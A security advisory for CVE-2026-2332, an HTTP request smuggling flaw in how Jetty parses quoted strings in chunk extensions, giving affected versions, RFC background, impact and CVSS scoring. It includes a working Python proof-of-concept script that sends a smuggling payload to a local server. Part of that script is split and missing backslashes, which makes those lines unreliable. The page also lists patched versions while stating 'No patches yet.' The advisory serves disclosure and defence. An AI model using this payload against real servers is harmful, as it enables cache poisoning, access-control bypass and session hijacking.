

HTTP Request Smuggling via Chunked Extension Quoted-String Parsing

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Package

 **org.eclipse.jetty:jetty-http** ([Maven](#))

Affected versions

>=12.1.0, <=12.1.6
>=12.0.0, <=12.0.32
>=11.0.0, <=11.0.27
>=10.0.0, <=10.0.27
>=9.4.0, <=9.4.59

Patched versions

12.1.7
12.0.33
11.0.28
10.0.28
9.4.60

Description

Description (as reported)

Jetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.

Background

This vulnerability is a new variant discovered while researching the "Funky Chunks" HTTP request smuggling techniques:

- <https://w4ke.info/2025/06/18/funky-chunks.html>
- <https://w4ke.info/2025/10/29/funky-chunks-2.html>

The original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.

Technical Details

RFC 9112 Section 7.1.1 defines chunked transfer encoding:

```
chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string
```



RFC 9110 Section 5.6.4 defines quoted-string:

```
quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE
```



A quoted-string continues until the closing DQUOTE, and `\r\n` sequences are not permitted within the quotes.

Vulnerability

Jetty terminates chunk header parsing at `\r\n` inside quoted strings instead of treating this as an error.

Expected (RFC compliant):

```
Chunk: 1;a="value\r\nhere"\r\n
      ^^^^^^^^^^^^^^^^^^^^^^^^^ extension value
Body: [1 byte after the real \r\n]
```



Actual (jetty):

```
Chunk: 1;a="value
      ^^^^^ terminates here (WRONG)
Body: here"... treated as body/next request
```



Proof of Concept

```
#!/usr/bin/env python3
import socket

payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b'1;a="\r\n'
    b"X\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
```



```

    b'"r\n'
    b"Yr\n"
    b"0r\n"
    b"r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)

response = b""
while True:
    try:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
    except socket.timeout:
        break

sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))

```

Result: Server returns 2 HTTP responses from a single TCP connection.

Parsing Breakdown

Parser	Request 1	Request 2
jetty (vulnerable)	POST / body="X"	GET /smuggled (SMUGGLED!)
RFC compliant	POST / body="Y"	(none - smuggled request hidden in extension)

Impact

- **Request Smuggling:** Attacker injects arbitrary HTTP requests
- **Cache Poisoning:** Smuggled responses poison shared caches
- **Access Control Bypass:** Smuggled requests bypass frontend security
- **Session Hijacking:** Smuggled requests can steal other users' responses

Reproduction

1. Start the minimal POC with docker
2. Run the poc script provided in same zip

Suggested Fix

Ensure the chunk framing and extensions are parsed exactly as specified in RFC9112.
A CRLF inside a quoted-string should be considered a parsing error and not a line terminator.

Patches

No patches yet.

Workarounds

No workarounds yet.

References

- RFC 9110: HTTP Semantics (Sections 5.6.4, 7.1.1)
- Funky Chunks Research: <https://w4ke.info/2025/06/18/funky-chunks.html>
- details for security versions <https://jetty.org/security.html>

Severity

High 7.4 / 10

CVSS v3 base metrics

Attack vector	Network
Attack complexity	High
Privileges required	None
User interaction	None
Scope	Unchanged
Confidentiality	High
Integrity	High
Availability	None

[Learn more about base metrics](#)

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVE ID

CVE-2026-2332

Weaknesses

► CWE-444

Credits



xclow3n

Reporter